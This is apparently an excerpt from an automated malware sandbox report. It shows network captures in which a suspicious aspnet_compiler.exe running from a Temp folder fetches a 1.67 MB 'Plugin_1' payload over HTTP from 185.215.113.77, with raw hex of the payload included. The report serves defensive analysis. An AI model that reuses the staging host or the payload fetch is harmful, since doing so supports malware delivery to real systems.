                                                    Oct 8, 2021 14:29:14.523401022 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523418903 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523430109 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.523459911 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523475885 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523474932 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.523495913 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523513079 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523519993 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.523528099 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523544073 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523559093 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523572922 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523583889 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.523588896 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523605108 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523622036 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523627043 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.523641109 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523655891 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.523955107 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.547030926 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.547071934 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.550101042 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.550126076 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.550137043 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.550149918 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.550265074 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.584929943 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.584964037 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.584976912 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.584995985 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.585110903 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.587316990 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587337017 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587348938 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587364912 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587377071 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587388992 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587400913 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587413073 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587424994 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587435961 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587449074 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587460995 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587476015 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587487936 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587511063 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587529898 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587547064 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587563992 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587580919 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587591887 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587604046 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587615967 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587627888 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587646961 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587662935 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587680101 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587699890 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587718964 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587734938 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587749004 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.587753057 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587770939 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587789059 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587799072 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.587807894 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587825060 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.587846994 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.587878942 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.613028049 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.613055944 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.613068104 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.613080025 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.613092899 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.613111019 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.613440990 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.647888899 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.647953987 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.647993088 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.648027897 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.648065090 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.648099899 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.651015043 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651040077 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651051998 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651065111 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651081085 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651097059 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651132107 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651134968 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.651150942 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651160955 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.651168108 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651185036 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651197910 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.651204109 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651222944 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651232958 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.651242018 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651261091 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651277065 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651292086 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651309967 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651315928 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.651328087 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651348114 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651360989 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.651366949 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651385069 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651401997 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651401997 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.651415110 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651427984 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651434898 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.651438951 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651452065 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.651576042 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.652079105 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.652199984 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.652221918 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.652240038 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.652256966 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.652268887 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.652275085 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.652292013 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.652302027 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.652309895 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.652328014 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.652345896 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.652378082 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.674496889 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.674530029 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.674544096 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.674555063 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.674567938 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.674586058 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.674715996 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.674803019 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.710524082 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.710551977 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.710632086 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.710706949 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.710736990 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.710789919 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.712426901 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712447882 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712460041 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712472916 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712486029 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712497950 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712516069 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712531090 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712588072 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712589025 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.712605953 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712624073 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712642908 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712655067 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.712661028 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712677956 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712683916 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.712694883 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712711096 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712727070 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712739944 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.712743044 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712759972 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712779045 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712784052 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.712816954 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712830067 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712851048 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712862015 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712873936 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712887049 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712903976 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.712918997 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.713087082 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.713114023 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.713201046 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.713217020 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.713254929 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.713318110 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.713332891 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.713387966 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.713452101 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.713505983 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.713557959 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.736881971 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.736905098 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.736922979 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.736938953 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.736953974 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.736969948 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.736984968 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.737004995 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.737011909 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.737068892 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.772661924 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.772689104 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.772701025 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.772716045 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.773217916 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:14.774730921 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:14.833285093 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:19.657478094 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:19.657665968 CEST4983280192.168.2.3185.215.113.77

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Oct 8, 2021 14:27:58.178817987 CEST8.8.8.8192.168.2.30x8087No error (0)windowsupdate.s.llnwi.net178.79.242.0A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • 185.215.113.77

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.349832185.215.113.7780C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Oct 8, 2021 14:29:11.215204000 CEST6325OUTGET /Plugin_1 HTTP/1.1
                                                    Host: 185.215.113.77
                                                    Connection: Keep-Alive
                                                    Oct 8, 2021 14:29:11.277029037 CEST6327INHTTP/1.1 200 OK
                                                    Date: Fri, 08 Oct 2021 12:29:11 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                    Last-Modified: Sun, 26 Sep 2021 14:48:37 GMT
                                                    ETag: "197bd9-5cce713541a10"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 1670105
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Data Raw: 00 1a 2c 00 54 54 16 58 1f fd 11 7d 3f fc ca 62 43 9c a1 d6 50 ed b4 38 6d 0f e2 73 1a 73 6a 72 ca 72 82 73 0c 73 b4 73 90 e4 db 60 47 1c 34 4e 31 41 b8 27 44 46 cb 0d 1c 1e 6c 61 80 08 8e 8a de 03 0b a7 5f 1c 48 10 c1 6e 71 11 41 4e 04 14 10 66 1f 7b 68 f4 fe a1 11 d9 d0 9f 60 bf 74 91 4e f2 82 b2 74 10 70 7e e9 30 4a 14 27 c6 33 34 70 4a b3 85 30 4e 89 f6 8d f6 09 b7 f1 f0 8f ea 1f 74 f9 94 19 47 e1 85 02 3a 3e d3 30 7c 45 8a ac 3a 3b 8c 34 7f bf a9 87 3b 09 92 27 df d4 d3 3a 4b 04 c6 8d 11 19 89 dc 3d 24 5d a6 68 f4 66 2e 8d 02 29 5d 84 77 0f 49 65 32 19 96 7e 5d 80 c1 1a 16 63 e1 94 5b 0d 89 f5 e8 9a 73 77 7f e5 75 b0 b5 7c 7b 1c 2c 9c 5c a4 9f 36 36 16 56 4e 32 83 bc 0d 85 ad a3 85 ae 60 36 36 e6 fa 52 87 b1 b2 b7 b6 b6 c4 fe 77 b7 74 73 35 7f e4 c9 10 9d 17 eb e0 50 d0 ff 7d 44 c3 fd 6f 6a 6a ee 6a 6f 20 b6 17 8f a5 79 31 3d e4 c7 b7 93 19 37 29 ff 74 e3 f2 9f 89 f1 3e 3b e6 3f 75 c3 f2 60 5f e4 c1 df c9 8f 3f c3 0a 74 04 f0 c6 37 98 11 de 18 ba f3 03 db c3 0a 3f 30 2d bc 9f e1 32 1b c8 2a de 18 17 bc 82 4b c3 07 77 90 91 78 62 2e f2 1f cf 0c 71 de 43 b9 e0 ff 18 74 fb 00 c0 99 b5 ff 4c 19 83 7e 04 0c db 90 e5 73 e0 d8 c9 81 fe 0d 8c 56 d1 03 11 b7 f0 6c 85 3a 0c a1 3e 01 6e b0 19 d1 f9 fa 9b 04 c7 21 4d 1e 84 22 36 3c 3a c3 0f 8a 13 4f a2 87 25 0f 4b 1e 86 c4 08 4c a2 c3 c4 5b 6f 3d 9b e7 c6 74 81 e9 43 83 63 83 a3 ed fd d0 ad 03 15 1e 9a 27 21 e5 3e 13 33 07 44 c5 fb a0 c9 2c 1c bf 26 83 f6 d0 fb 34 da 4f 88 80 f0 eb 4c 18 63 a3 33 1b 26 45 54 1a d3 da e9 83 3a 00 e0 f0 9f 30 e4 28 8d 63 f4 c2 30 fb a6 c2 22 fc f5 30 04 44 60 8e 8b f6 0b 0b d0 c3 e6 1e 88 2f c3 3a 7c 3a 26 25 09 86 70 82 a1 90 26 86 f9 87 a0 c1 87 d8 d6 54 39 9d 42 83 3a 04 94 26 e9 c2 23 42 7d fd c2 7d 30 66 42 95 37 ad 9e 71 71 42 68 1e 1c 1f e1 17 ee 1e 99 0a 43 7d 23 14 26 e1 11 c1 19 a3 d2 c7 25 0b 0f 8d 4c 60 28 fd d5 82 57 e0 00 b6 8f f3 ef bc 06 4b 6a 2e f0 ce 21 1f 8b 40 06 56 90 b4 63 50 ae fe df 9c c0 fa c0 5e b1 64 bf f4 81 10 00 be df e7 f0 ff 99 3a 81 88 3f 80 23 f2 1e c0 70 bd b0 ba 78 87 30 e9 65 9e 9d ec ff 0c e0 13 59 17 84 7c 4f bb 1d a1 64 0c 65 eb 42 c9 df 84 4d bf f1 ea b5 04 6c 6b 08 9d 78 78 c0 cc 2b 9c 32 3c 21 02 6d 04 15 c4 7e f1 09 1d 47 ca 18 44 20 5c a0 6d e5 09 a0 20 a2 27 d1 48 82 30 94 32 6e 51 e8 cb 9f 2b bc a3 dd 20 09 8c 14 a1 d2 10 87 2c 32 59 51 7d 60 9f 81 e6 3a f9 c2 a5 0c 12 c4 24 54 90 f7 80 c4 c3 99 6c 0a cb 02 1e 27 3a 34 be 3f 77 e1 03 da 41 c8 78 83 e9 ff e3 8e eb e7 47 30 3e 34 40 27 ca 07 c0 91 03 09 94 19 80 e0 2d 0c 6b 97 ff f9 7c 04 9b fe 7e 18 cb e2 5c ca 02 20 01 07 0e 6a 1d 01 42 0c 16 d4 20 41 c2 0c 10 68 82 60 13 9e 21 c6 be b0 3d fe 00 87 d5 3f 52 bc f4 0a 40 61 e9 51 70 34 25 9d 11 df 86 ce 7e 1a de 61 6c 07 60 6b 37 e1 1c 01 69 f8 2f 01 38 19 3d 42 4f c1 ac 75 05 3b 95 14 cb 7e 87 31 f4 89 2d 61 d0 91 ca 7f 26 40 78 a7 fb f4 39 8f c3 43 01 c5 46 5f a0 d2 34 16 87 1f 30 8d 00 51 95 f1 b2 a0 ca 87 20 49 af 73 09 d3 f3 94 ff 06 43 f9 e5 1b e5 61 5f 02 57 16 12 75 45 ec 6d e9 92 22 63 38 bc a2 5f 36 15 9e 77 f4 6b 5c f7 97 5b 09 e2 09 35 d8 f2 41 92 0a e3 41 2c 60 82 fd a8 87 b4 16 fe 9e dd
                                                    Data Ascii: ,TTX}?bCP8mssjrrsss`G4N1A'DFla_HnqANf{h`tNtp~0J'34pJ0NtG:>0|E:;4;':K=$]hf.)]wIe2~]c[swu|{,\66VN2`66Rwts5P}Dojjjo y1=7)t>;?u`_?t7?0-2*Kwxb.qCtL~sVl:>n!M"6<:O%KL[o=tCc'!>3D,&4OLc3&ET:0(c0"0D`/:|:&%p&T9B:&#B}}0fB7qqBhC}#&%L`(WKj.!@VcP^d:?#px0eY|OdeBMlkxx+2<!m~GD \m 'H02nQ+ ,2YQ}`:$Tl':4?wAxG0>4@'-k|~\ jB Ah`!=?R@aQp4%~al`k7i/8=BOu;~1-a&@x9CF_40Q IsCa_WuEm"c8_6wk\[5AA,`
                                                    Oct 8, 2021 14:29:11.277100086 CEST6328INData Raw: 90 fa 47 6c 60 9f f5 84 0b be c0 f5 05 b8 46 4b 3c 10 3e 9e ee 81 57 43 e1 16 54 24 5d f6 28 f3 47 95 0a f9 a0 f4 a2 9e a8 5d cc 16 ce bb 1a 4c f9 eb 3e 6b ea 21 c7 35 12 36 b4 25 85 e5 b1 23 9d 8a 23 bd 08 3e d1 4d cf 43 78 d8 5b 1b 08 8f 58 e7
                                                    Data Ascii: Gl`FK<>WCT$](G]L>k!56%##>MCx[X+z3w;><7{b'j`LM{o^#OAV}*I>|l'H=r){ OG@j8&sZ8K%36
                                                    Oct 8, 2021 14:29:11.277147055 CEST6329INData Raw: 24 4e fb 5a 71 7e 61 5e ac 03 e4 1b 8a 89 1c 6c 26 28 57 0b 5d ef 0d f2 25 12 a2 79 eb 02 d5 ba 6f 11 71 fe 01 66 10 95 11 94 fb bb ea cf bd 0f fe d4 ba 1c dc 54 48 e2 a2 05 50 87 41 e9 74 a8 9e 16 c2 9a f3 65 a4 7a 90 6d cf a5 83 71 4a fa 38 b7
                                                    Data Ascii: $NZq~a^l&(W]%yoqfTHPAtezmqJ8P<>tllLAG?y.!|U"K*_sssk;^<yQen^W6_$$)Q<SRQ}JP4f2Z! _!67q@Lfv&
                                                    Oct 8, 2021 14:29:11.277185917 CEST6331INData Raw: 66 7e 49 00 73 73 4a c9 a4 5d c8 e8 77 35 b1 24 dd b9 a0 09 50 b4 94 d6 e9 ab af 03 67 6e 65 58 ac 1c 88 62 ec c4 ae aa 3b 9d cf 9e ff f8 09 38 bd 5c 9e 49 2b e7 78 3a a6 d3 c6 8e aa a5 b5 5d c6 e7 05 35 b6 48 1c ba 62 89 4c e4 21 7e da bd 5e eb
                                                    Data Ascii: f~IssJ]w5$PgneXb;8\I+x:]5HbL!~^jeV52Zl|*:[+lH"ty/v8\Ki,.zPBJ59hK(D{cSIx?xEu/2_4s/c8O
                                                    Oct 8, 2021 14:29:11.277225971 CEST6332INData Raw: 59 7b 75 35 66 aa 4a 3f b7 d6 c5 7a 5d ad c0 6b f1 17 bb af 34 d0 cc 16 47 3e e5 e5 35 75 71 fb 04 d2 6d b0 0e de 4c 05 89 31 93 ec f7 d0 46 81 11 c7 30 2f d7 8f 16 eb 56 b7 73 79 a5 fe 7f 38 56 19 3a 3e e0 2f f3 83 1e 39 c0 92 f4 56 9e 12 63 5b
                                                    Data Ascii: Y{u5fJ?z]k4G>5uqmL1F0/Vsy8V:>/9Vc[Cz:*^QlD%TWUF}[Q]Afepw*{vhaP\m;7#{{_2^_]Apwl;iTn4cF%Q{?jXxwnm;6?
                                                    Oct 8, 2021 14:29:11.277265072 CEST6334INData Raw: 5b b9 b7 4a 4c ab 9c d0 5d 60 aa 96 c7 25 e0 16 fe cc e3 a3 fe 4c 66 92 f3 93 b7 e9 25 75 ab ae d1 de 9e 64 8e ea 93 87 d9 24 23 f2 58 f3 05 49 b4 0e 36 15 b1 de 75 4c 05 b4 8f 97 cc 3a 05 af 9b 78 e3 92 47 1e 99 35 f6 35 4e 95 47 f5 2b 74 fd 71
                                                    Data Ascii: [JL]`%Lf%ud$#XI6uL:xG55NG+tq{X.pMtVnvK[s;PUwFj0rkAH6{K@Pv%Zsf9g?Et8~*q=`-f]<z:Z0->b&]}<9NOxI/@;@?
                                                    Oct 8, 2021 14:29:11.277302980 CEST6335INData Raw: ef b4 ed 62 95 eb 1b bf b2 98 3f 5e fb 4c 7b de ce 5e a9 dd 16 01 d3 d2 0a f1 9c c4 a6 10 9c d0 0d 29 2f a4 b0 eb 61 03 b3 a0 94 14 1b 94 33 f3 49 5f 21 eb 20 51 e2 0c fb 95 2b 00 8a 66 d8 82 4c a7 5c 9f a3 6a b7 84 0f cf 3b c8 82 7e 4a 0d 3a 82
                                                    Data Ascii: b?^L{^)/a3I_! Q+fL\j;~J:[Ir0]E%N__ ^g'K}7@k.cDJb`|e[t=lU:ye.xYots4v<J}an"7Hzg0ZnP,cnBwZ%|N)<t
